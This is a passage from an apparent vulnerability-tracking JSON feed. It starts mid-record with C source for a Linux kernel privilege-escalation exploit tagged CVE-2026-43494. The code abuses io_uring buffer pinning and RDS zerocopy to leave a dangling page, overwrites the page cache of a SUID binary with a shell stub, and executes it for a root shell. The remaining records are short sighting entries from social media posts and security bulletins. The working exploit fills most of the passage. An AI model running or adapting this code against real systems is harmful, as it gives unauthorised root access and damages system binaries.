*r->cq_head;\n uint32_t tail;\n\n for (int i = 0; i < 1000; i++) {\n tail = __atomic_load_n(r->cq_tail, __ATOMIC_ACQUIRE);\n if (head != tail) break;\n usleep(1000);\n }\n tail = __atomic_load_n(r->cq_tail, __ATOMIC_ACQUIRE);\n if (head == tail) {\n ERR(\"CQ timeout \u2014 no completion\");\n return -1;\n }\n\n uint32_t idx = head & *r->cq_mask;\n if (res_out) *res_out = r->cqes[idx].res;\n __atomic_store_n(r->cq_head, head + 1, __ATOMIC_RELEASE);\n return 0;\n}\n\nstatic void uring_destroy(struct uring *r) {\n if (r->sq_ring && r->sq_ring != MAP_FAILED) munmap(r->sq_ring, r->sq_ring_sz);\n if (r->cq_ring && r->cq_ring != MAP_FAILED) munmap(r->cq_ring, r->cq_ring_sz);\n if (r->sqes && r->sqes != MAP_FAILED) munmap(r->sqes, r->sqes_sz);\n if (r->fd >= 0) close(r->fd);\n memset(r, 0, sizeof(*r));\n r->fd = -1;\n r->sq_ring = r->cq_ring = MAP_FAILED;\n r->sqes = MAP_FAILED;\n}\n\nstatic int create_payload_file(void) {\n char path[] = \"/tmp/.payload_XXXXXX\";\n int fd = mkstemp(path);\n if (fd < 0) {\n ERR(\"mkstemp: %s\", strerror(errno));\n return -1;\n }\n unlink(path);\n\n uint8_t page[PAGE_SIZE];\n memset(page, 0, sizeof(page));\n memcpy(page, SHELL_ELF, sizeof(SHELL_ELF));\n\n if (write(fd, page, PAGE_SIZE) != PAGE_SIZE) {\n ERR(\"write payload: %s\", strerror(errno));\n close(fd);\n return -1;\n }\n return fd;\n}\n\nstatic int evict_page_cache(const char *path) {\n int fd = open(path, O_RDONLY);\n if (fd < 0) {\n ERR(\"fadvise open: %s\", strerror(errno));\n return -1;\n }\n if (posix_fadvise(fd, 0, PAGE_SIZE, POSIX_FADV_DONTNEED) < 0) {\n ERR(\"posix_fadvise: %s\", strerror(errno));\n close(fd);\n return -1;\n }\n close(fd);\n return 0;\n}\n\nstatic int attempt_exploit(const char *target, pid_t *daemon_out, int show_phases) {\n if (show_phases)\n ui_phase(\"Memory & io_uring setup\");\n\n void *buf = mmap(NULL, 2 * PAGE_SIZE, PROT_READ | PROT_WRITE,\n MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);\n if (buf == MAP_FAILED) {\n ERR(\"mmap buf: %s\", strerror(errno));\n return -1;\n }\n memset(buf, 0, PAGE_SIZE);\n\n if (mprotect((char *)buf + PAGE_SIZE, PAGE_SIZE, PROT_NONE) < 0) {\n ERR(\"mprotect guard: %s\", strerror(errno));\n munmap(buf, 2 * PAGE_SIZE);\n return -1;\n }\n\n char addr_buf[32];\n snprintf(addr_buf, sizeof(addr_buf), \"%p\", buf);\n ui_stat_box(\"Pinned page\", addr_buf, ANSI_MAGENTA);\n OK(\"2-page mapping + PROT_NONE guard @ %p\", (char *)buf + PAGE_SIZE);\n\n struct uring ring, ring2;\n memset(&ring, 0, sizeof(ring));\n memset(&ring2, 0, sizeof(ring2));\n ring.fd = ring2.fd = -1;\n ring.sq_ring = ring.cq_ring = ring.sqes = MAP_FAILED;\n ring2.sq_ring = ring2.cq_ring = ring2.sqes = MAP_FAILED;\n\n if (uring_setup(&ring, 4) < 0) goto fail_buf;\n if (uring_register_buffers(&ring, buf, PAGE_SIZE) < 0) goto fail_ring;\n OK(\"Ring-1 buffer registered (FOLL_PIN +%d)\", GUP_PIN_COUNTING_BIAS);\n\n if (uring_setup(&ring2, 1) < 0) goto fail_ring;\n if (uring_clone_buffers(&ring2, &ring) < 0) goto fail_ring2;\n OK(\"Ring-2 cloned buffer table (imu->refs = 2)\");\n\n pid_t daemon = spawn_ring_holder(ring2.fd);\n if (daemon < 0) {\n ERR(\"fork daemon: %s\", strerror(errno));\n goto fail_ring2;\n }\n uring_destroy(&ring2);\n char pid_buf[16];\n snprintf(pid_buf, sizeof(pid_buf), \"%d\", (int)daemon);\n ui_stat_box(\"Ring holder\", pid_buf, ANSI_CYAN);\n OK(\"Daemon holds ring2 fd (blocks unpin on cleanup)\");\n *daemon_out = daemon;\n\n if (show_phases)\n ui_phase(\"Pin reference theft (RDS zerocopy)\");\n\n LOG(\"Stealing %d pin refs via RDS zerocopy...\", GUP_PIN_COUNTING_BIAS);\n int stolen = 0;\n for (int i = 0; i < GUP_PIN_COUNTING_BIAS; i++) {\n if (steal_one_ref(buf, PORT_BASE + i * 2) == 0)\n stolen++;\n if ((i & 31) == 0 || i == GUP_PIN_COUNTING_BIAS - 1)\n ui_progress(i + 1, GUP_PIN_COUNTING_BIAS);\n }\n OK(\"Stole %d/%d references\", stolen, GUP_PIN_COUNTING_BIAS);\n if (stolen < GUP_PIN_COUNTING_BIAS - 10) {\n ERR(\"Too few stolen refs (%d) \u2014 RDS may be unavailable\", stolen);\n goto fail_ring;\n }\n\n if (show_phases)\n ui_phase(\"Page cache overwrite & privesc\");\n\n LOG(\"Evicting page 0 of %s from page cache\", target);\n if (evict_page_cache(target) < 0) goto fail_ring;\n OK(\"Page cache evicted\");\n\n LOG(\"Draining PCP (256 populate mmaps)...\");\n void *drain[256];\n for (int i = 0; i < 256; i++) {\n drain[i] = mmap(NULL, PAGE_SIZE, PROT_READ | PROT_WRITE,\n MAP_PRIVATE | MAP_ANONYMOUS | MAP_POPULATE, -1, 0);\n }\n OK(\"PCP drain complete\");\n\n LOG(\"munmap pinned page \u2192 free to PCP top\");\n if (munmap(buf, PAGE_SIZE) < 0) {\n ERR(\"munmap: %s\", strerror(errno));\n for (int i = 0; i < 256; i++)\n if (drain[i] != MAP_FAILED) munmap(drain[i], PAGE_SIZE);\n goto fail_ring;\n }\n OK(\"Page freed \u2014 io_uring retains dangling struct page*\");\n\n LOG(\"pread %s \u2192 reclaim freed frame as page cache\", target);\n int tfd = open(target, O_RDONLY);\n if (tfd < 0) {\n ERR(\"open target: %s\", strerror(errno));\n for (int i = 0; i < 256; i++)\n if (drain[i] != MAP_FAILED) munmap(drain[i], PAGE_SIZE);\n goto fail_ring;\n }\n uint8_t scratch[PAGE_SIZE];\n if (pread(tfd, scratch, PAGE_SIZE, 0) < 0) {\n ERR(\"pread: %s\", strerror(errno));\n close(tfd);\n for (int i = 0; i < 256; i++)\n if (drain[i] != MAP_FAILED) munmap(drain[i], PAGE_SIZE);\n goto fail_ring;\n }\n close(tfd);\n OK(\"Page cache populated at reclaimed frame\");\n\n for (int i = 0; i < 256; i++)\n if (drain[i] != MAP_FAILED) munmap(drain[i], PAGE_SIZE);\n\n int payload_fd = create_payload_file();\n if (payload_fd < 0) goto fail_ring;\n OK(\"Payload file ready (%zu byte ELF stub)\", sizeof(SHELL_ELF));\n\n LOG(\"IORING_OP_READ_FIXED \u2192 DMA overwrite page cache via dangling page\");\n if (uring_submit_read_fixed(&ring, payload_fd, buf, PAGE_SIZE) < 0) {\n close(payload_fd);\n goto fail_ring;\n }\n\n int32_t cqe_res;\n if (uring_wait_cqe(&ring, &cqe_res) < 0) {\n close(payload_fd);\n goto fail_ring;\n }\n close(payload_fd);\n\n if (cqe_res < 0) {\n ERR(\"READ_FIXED CQE: %d (%s)\", cqe_res, strerror(-cqe_res));\n goto fail_ring;\n }\n OK(\"DMA write complete (%d bytes)\", cqe_res);\n\n tfd = open(target, O_RDONLY);\n if (tfd < 0) {\n ERR(\"verify open: %s\", strerror(errno));\n goto fail_ring;\n }\n uint8_t check[sizeof(SHELL_ELF)];\n if (pread(tfd, check, sizeof(check), 0) != (ssize_t)sizeof(check)) {\n ERR(\"verify pread: %s\", strerror(errno));\n close(tfd);\n goto fail_ring;\n }\n close(tfd);\n\n if (memcmp(check, SHELL_ELF, sizeof(SHELL_ELF)) != 0) {\n ERR(\"Verification failed \u2014 page cache not overwritten (race lost?)\");\n goto fail_ring;\n }\n OK(\"Verified: page 0 matches SHELL_ELF stub\");\n\n uring_destroy(&ring);\n munmap((char *)buf + PAGE_SIZE, PAGE_SIZE);\n\n ui_footer(1);\n LOG(\"Executing %s (injected stub \u2192 /bin/sh as root)\", target);\n {\n const char *bn = strrchr(target, '/');\n bn = bn ? bn + 1 : target;\n fprintf(stderr,\n ANSI_YELLOW \" \u25c7 Restore: cp /tmp/.backup_%s_%d %s && chmod u+s %s\\n\" ANSI_RESET,\n bn, getpid(), target, target);\n }\n for (int fd = 3; fd < 1024; fd++) close(fd);\n execl(target, target, (char *)NULL);\n ERR(\"execl: %s\", strerror(errno));\n return -1;\n\nfail_ring2:\n uring_destroy(&ring2);\nfail_ring:\n uring_destroy(&ring);\nfail_buf:\n if (buf != MAP_FAILED) munmap(buf, 2 * PAGE_SIZE);\n return -1;\n}\n\nint main(void) {\n ui_banner();\n pin_cpu(0);\n\n ui_phase(\"Reconnaissance\");\n LOG(\"Affinity locked to CPU 0\");\n ui_stat_box(\"CPU pin\", \"cpu0\", ANSI_CYAN);\n\n const char *target = find_suid_target();\n if (!target) {\n ERR(\"No SUID binary found\");\n ui_footer(0);\n return 1;\n }\n ui_stat_box(\"SUID target\", target, ANSI_YELLOW);\n\n if (backup_target(target) < 0) {\n ERR(\"Backup failed \u2014 aborting for safety\");\n ui_footer(0);\n return 1;\n }\n\n pid_t daemons[MAX_RETRIES];\n int ndaemons = 0;\n\n for (int attempt = 0; attempt < MAX_RETRIES; attempt++) {\n if (attempt > 0) {\n fprintf(stderr, \"\\n\");\n LOG(\"Retry attempt %d/%d\", attempt + 1, MAX_RETRIES);\n }\n\n pid_t daemon = 0;\n int ret = attempt_exploit(target, &daemon, attempt == 0);\n if (daemon > 0)\n daemons[ndaemons++] = daemon;\n if (ret == 0)\n return 0;\n if (attempt < MAX_RETRIES - 1) {\n ERR(\"Attempt %d failed\", attempt + 1);\n sleep(1);\n }\n }\n\n for (int i = 0; i < ndaemons; i++) {\n kill(daemons[i], SIGKILL);\n waitpid(daemons[i], NULL, 0);\n }\n ui_footer(0);\n ERR(\"All %d attempts failed \u2014 kernel may be patched or RDS/io_uring unavailable\", MAX_RETRIES);\n return 1;\n}", "creation_timestamp": "2026-05-26T12:09:45.000000Z"}, {"uuid": "e0d5889b-b40f-4604-ba85-f44a84304ff2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43494", "type": "seen", "source": "https://bsky.app/profile/o2cloud.bsky.social/post/3mmyrdb3ep623", "content": "\ud83d\udd17 CVE : CVE-2026-23171, CVE-2026-43494, CVE-2026-43503, CVE-2026-46174, CVE-2026-46300", "creation_timestamp": "2026-05-29T14:40:12.485170Z"}, {"uuid": "4d2d220d-1691-4be2-accc-2e97c908bec0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43494", "type": "seen", "source": "https://t.me/GithubRedTeam/86529", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026 #POC\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-43494-PinTheft-PoC\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a letsr00t\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a C\n\u2b50 Star\u6570\u91cf\uff1a 0 | \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-30 11:45:59\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\n\u65e0\u63cf\u8ff0\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-30T12:00:06.000000Z"}, {"uuid": "084c9ea3-69c8-4768-bcc0-d1f588582a84", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2026-43494", "type": "seen", "source": "https://www.hkcert.org/security-bulletin/suse-linux-kernel-multiple-vulnerabilities_20260601", "content": "", "creation_timestamp": "2026-05-31T20:00:00.000000Z"}, {"uuid": "8999306d-ec91-43bb-9638-01c1e0ae38a3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43493", "type": "seen", "source": "https://bsky.app/profile/keiwork35.bsky.social/post/3mn7wluuozh2t", "content": "\u3010\u7dca\u6025\u3011CVE-2026-43493 \uff08\u88fd\u54c1\u540d\u30fb\u30d0\u30fc\u30b8\u30e7\u30f3\uff09\u306b\u6df1\u523b\u306a\u8106\u5f31\u6027\uff5c\u5373\u6642\u5bfe\u5fdc\u304c\u5fc5\u8981\n\n\u3053\u306e\u8106\u5f31\u6027\u306f\u3001Linux\u30ab\u30fc\u30cd\u30eb\u306b\u304a\u3051\u308bMAY_BACKLOG\u30ea\u30af\u30a8\u30b9\u30c8\u306e\u51e6\u7406\u306b\u95a2\u3059\u308b\u554f\u984c\u3067\u3059\u3002\u3053\u308c\u306b\u3088\u308a\u3001EBUSY\u304c\u8fd4\u3055\u308c\u308b\u5834\u5408\u304c\u3042\u308a\u3001\u305d\u306e\u5024\u3092\u78ba\u8a8d\u3057\u3066EINPROGRESS\u901a\u77e5\u3092\u30d5\u30a3\u30eb\u30bf\u30ea\u30f3\u30b0\u3059\u308b\u5fc5\u8981\u304c\u3042\u308a\u307e\u3059\u3002", "creation_timestamp": "2026-06-01T11:03:08.546203Z"}, {"uuid": "183a0848-b348-4637-858b-792b18456d38", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43494", "type": "seen", "source": "Telegram/cXofYTKCEb7MAqpqCLq9-4nZzN6JY2AAp_zXbpQr5zG2YYk", "content": "", "creation_timestamp": "2026-05-30T15:00:16.000000Z"}, {"uuid": "88a0370d-0e49-4e8b-adb6-a1b8a7eada88", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43494", "type": "seen", "source": "Telegram/5hgQ8AKXX2p6Xv_JteDWfDLu6UEUErMaTbIKv1z5cXU-g7Q", "content": "", "creation_timestamp": "2026-05-28T15:00:08.000000Z"}, {"uuid": "72f9b760-9e8d-46d4-b459-41d6155ee9eb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43491", "type": "seen", "source": "https://bsky.app/profile/ferramentaslinux.bsky.social/post/3mnn63qtduk2c", "content": "\ud83d\udd12 Vulnerabilidades cr\u00edticas no kernel do Linux afetam o #Mageia 9 (CVE-2026-43491 a CVE-2026-43493). Saiba mais: -> tinyurl.com/4xcxvrw8", "creation_timestamp": "2026-06-06T17:22:00.134208Z"}, {"uuid": "3cdf43c3-0c50-4ef9-9316-cc003ccca7b1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43493", "type": "seen", "source": "https://bsky.app/profile/ferramentaslinux.bsky.social/post/3mnn63qtduk2c", "content": "\ud83d\udd12 Vulnerabilidades cr\u00edticas no kernel do Linux afetam o #Mageia 9 (CVE-2026-43491 a CVE-2026-43493). Saiba mais: -> tinyurl.com/4xcxvrw8", "creation_timestamp": "2026-06-06T17:22:00.272006Z"}, {"uuid": "8e54a7cb-0fe9-4a86-8b69-d46f8618d99c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43491", "type": "seen", "source": "https://bsky.app/profile/ferramentaslinux.bsky.social/post/3mnn63tbews2c", "content": "\ud83d\udd12 Vulnerabilidades cr\u00edticas no kernel do Linux afetam o #Mageia 9 (CVE-2026-43491 a CVE-2026-43493). Saiba mais: -> tinyurl.com/4xcxvrw8", "creation_timestamp": "2026-06-06T17:22:00.790264Z"}, {"uuid": "af6c60e5-a92d-4df2-a031-1d772eb6984c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43493", "type": "seen", "source": "https://bsky.app/profile/ferramentaslinux.bsky.social/post/3mnn63tbews2c", "content": "\ud83d\udd12 Vulnerabilidades cr\u00edticas no kernel do Linux afetam o #Mageia 9 (CVE-2026-43491 a CVE-2026-43493). Saiba mais: -> tinyurl.com/4xcxvrw8", "creation_timestamp": "2026-06-06T17:22:00.959819Z"}, {"uuid": "7366849f-428d-4b19-80f1-9f0dbd57ecef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43491", "type": "seen", "source": "https://bsky.app/profile/ferramentaslinux.bsky.social/post/3mnn6774pd22b", "content": "\ud83d\udd12 Vulnerabilidades cr\u00edticas no kernel do Linux afetam o #Mageia 9 (CVE-2026-43491 a CVE-2026-43493). Saiba mais: -> tinyurl.com/4xcxvrw8", "creation_timestamp": "2026-06-06T17:23:55.350745Z"}, {"uuid": "ce9feec7-b506-4bc6-8bf5-a36dbe9c14d0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43493", "type": "seen", "source": "https://bsky.app/profile/ferramentaslinux.bsky.social/post/3mnn6774pd22b", "content": "\ud83d\udd12 Vulnerabilidades cr\u00edticas no kernel do Linux afetam o #Mageia 9 (CVE-2026-43491 a CVE-2026-43493). Saiba mais: -> tinyurl.com/4xcxvrw8", "creation_timestamp": "2026-06-06T17:23:55.615338Z"}, {"uuid": "33dc3a06-d5cd-437c-81f1-300923367436", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43491", "type": "seen", "source": "https://bsky.app/profile/ferramentaslinux.bsky.social/post/3mnn67bdix22b", "content": "\ud83d\udd12 Vulnerabilidades cr\u00edticas no kernel do Linux afetam o #Mageia 9 (CVE-2026-43491 a CVE-2026-43493). Saiba mais: -> tinyurl.com/4xcxvrw8", "creation_timestamp": "2026-06-06T17:23:59.471916Z"}, {"uuid": "1b202187-a3c7-4b70-a2d7-d36ed60746cf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43493", "type": "seen", "source": "https://bsky.app/profile/ferramentaslinux.bsky.social/post/3mnn67bdix22b", "content": "\ud83d\udd12 Vulnerabilidades cr\u00edticas no kernel do Linux afetam o #Mageia 9 (CVE-2026-43491 a CVE-2026-43493). Saiba mais: -> tinyurl.com/4xcxvrw8", "creation_timestamp": "2026-06-06T17:23:59.772793Z"}, {"uuid": "43ad0222-865a-444a-b280-2917acabcf3c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2026-43494", "type": "seen", "source": "https://www.hkcert.org/security-bulletin/ubuntu-linux-kernel-multiple-vulnerabilities_20260602", "content": "", "creation_timestamp": "2026-06-01T18:00:00.000000Z"}]}